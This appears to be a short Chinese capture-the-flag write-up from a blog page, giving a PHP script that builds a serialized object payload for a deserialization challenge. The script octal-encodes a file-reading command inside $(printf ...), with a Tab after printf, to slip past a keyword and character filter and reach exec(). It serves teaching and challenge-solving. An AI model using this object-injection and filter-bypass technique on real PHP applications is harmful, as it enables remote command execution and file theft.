php的payload如下:注意$printf后面接Tab,空格要被waf禁掉
<?php
highlight_file(__FILE__);
class ease{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
function __destruct(){
if (in_array($this->method, array("ping"))) {
call_user_func_array(array($this, $this->method), $this->args);
}
}
function ping($ip){
exec($ip, $result);
var_dump($result);
}
function waf($str){
if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
return $str;
} else {
echo "don't hack";
}
}
function __wakeup(){
foreach($this->args as $k => $v) {
$this->args[$k] = $this->waf($v);
}
}
}
$b = "cat flag_1s_here/flag_831b69012c67b35f.php";
$c = "";
for($i=0;$i<strlen($b);$i++){
$temp_str = decoct(ord(substr($b,$i,1)));
$c = $c."\\".$temp_str;
}
echo $c;
$c = '$(printf "'.$c.'")';
$a = array($c);
$ctf = new ease("ping",$a);
echo base64_encode(serialize($ctf));
?>
4525
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
